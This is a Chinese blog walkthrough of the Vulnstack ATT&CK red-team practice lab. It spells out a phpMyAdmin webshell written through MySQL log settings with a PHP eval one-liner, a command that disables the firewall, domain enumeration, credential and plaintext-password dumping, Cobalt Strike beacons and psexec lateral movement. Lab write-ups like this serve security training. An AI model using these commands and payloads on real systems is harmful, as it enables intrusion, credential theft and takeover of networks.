ATT&CK实战系列-红队实战(一)

2025-02-19 9 0

地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

ATT&CK实战系列-红队实战(一)插图

环境下载

下载靶场环境,并导入虚拟机
分别是win2003、win7、winserver2008

ATT&CK实战系列-红队实战(一)插图1

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式
分配的地址是192.168.52.0
ATT&CK实战系列-红队实战(一)插图2

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2
ATT&CK实战系列-红队实战(一)插图3ATT&CK实战系列-红队实战(一)插图4

win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)
ATT&CK实战系列-红队实战(一)插图5
总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。
win7:192.168.0.105、192.168.52.143
win2003:192.168.52.138
win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.105
2、扫描ip的端口,获得80和3306端口

ATT&CK实战系列-红队实战(一)插图6

3、访问80端口
获得phpstudy探针,获得绝对路径,探测出数据库弱口令
ATT&CK实战系列-红队实战(一)插图7ATT&CK实战系列-红队实战(一)插图8ATT&CK实战系列-红队实战(一)插图9
4、扫描192.168.0.105的目录
获得phpmyadmin目录

ATT&CK实战系列-红队实战(一)插图10

5、访问phpmyadmin
通过弱口令登录

ATT&CK实战系列-红队实战(一)插图11ATT&CK实战系列-红队实战(一)插图12

6、通过日志写入webshell
SHOW VARIABLES LIKE '%general%' #查看日志
ATT&CK实战系列-红队实战(一)插图13

set global general_log = "ON" #开启日志记录

ATT&CK实战系列-红队实战(一)插图14ATT&CK实战系列-红队实战(一)插图15

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

ATT&CK实战系列-红队实战(一)插图16ATT&CK实战系列-红队实战(一)插图17

select "<?php eval($_POST['123'])?>"; #写入webshell

ATT&CK实战系列-红队实战(一)插图18

访问webshell
ATT&CK实战系列-红队实战(一)插图19
使用蚁剑连接木马
ATT&CK实战系列-红队实战(一)插图20
7、phpmyadmin的getshell方法

(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。
show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值
如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出
如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下
如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制
在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件。

(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径
SHOW VARIABLES LIKE '%general%' #查看日志
set global general_log = "ON" #开启日志记录
set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件
select "<?php eval($_POST['123'])?>"; #写入webshell

以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径

内网渗透

1、打开CS,生成监听器
ATT&CK实战系列-红队实战(一)插图21

2、创建木马程序,将目标上线cs

ATT&CK实战系列-红队实战(一)插图22

3、通过蚁剑将cs创建的木马上传

ATT&CK实战系列-红队实战(一)插图23

4、启动木马,上线cs

ATT&CK实战系列-红队实战(一)插图24

5、主机上线后

netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ATT&CK实战系列-红队实战(一)插图25

ipconfig #查看信息,发现双网卡

ATT&CK实战系列-红队实战(一)插图26

net user #查看用户

ATT&CK实战系列-红队实战(一)插图27

提权

ATT&CK实战系列-红队实战(一)插图28ATT&CK实战系列-红队实战(一)插图29

net view #查看计算机列表,并且会将其他计算机列入CS

ATT&CK实战系列-红队实战(一)插图30ATT&CK实战系列-红队实战(一)插图31

net config Workstation #查看当前计算机名、域、登录域等

ATT&CK实战系列-红队实战(一)插图32
net view /domain #查看域

ATT&CK实战系列-红队实战(一)插图33

net localgruop administrators #查看域管

ATT&CK实战系列-红队实战(一)插图34
net tasklist #查看进程列表,是否存在杀软

ATT&CK实战系列-红队实战(一)插图35
net dclist #查看域控列表

ATT&CK实战系列-红队实战(一)插图36

提取凭证

ATT&CK实战系列-红队实战(一)插图37ATT&CK实战系列-红队实战(一)插图38

提取明文密码

ATT&CK实战系列-红队实战(一)插图39

创建smb监听器

ATT&CK实战系列-红队实战(一)插图40

psexec

ATT&CK实战系列-红队实战(一)插图41

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

ATT&CK实战系列-红队实战(一)插图42

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线

ATT&CK实战系列-红队实战(一)插图43ATT&CK实战系列-红队实战(一)插图44

新网站

phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录

ATT&CK实战系列-红队实战(一)插图45

ATT&CK实战系列-红队实战(一)插图46

获得新网站

ATT&CK实战系列-红队实战(一)插图47
公告信息获得敏感信息

ATT&CK实战系列-红队实战(一)插图48
后台弱口令登录

ATT&CK实战系列-红队实战(一)插图49ATT&CK实战系列-红队实战(一)插图50

通过新建文件上传木马
ATT&CK实战系列-红队实战(一)插图51ATT&CK实战系列-红队实战(一)插图52

在蚁剑获取到上传的目录
ATT&CK实战系列-红队实战(一)插图53
访问木马

ATT&CK实战系列-红队实战(一)插图54

连接木马

ATT&CK实战系列-红队实战(一)插图55


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

甲方安全何时需要自研安全产品?安全平台工程团队的价值与落地策略
Burpsuite基础使用教程
Kali linux hping3基础使用方法
DouCo DouPHP 安全漏洞(CVE-2024-57599)
9万个WordPress站点面临本地文件包含漏洞攻击
从中国视角看 NSA(方程式组织)的 TTP(攻击套路)

发布评论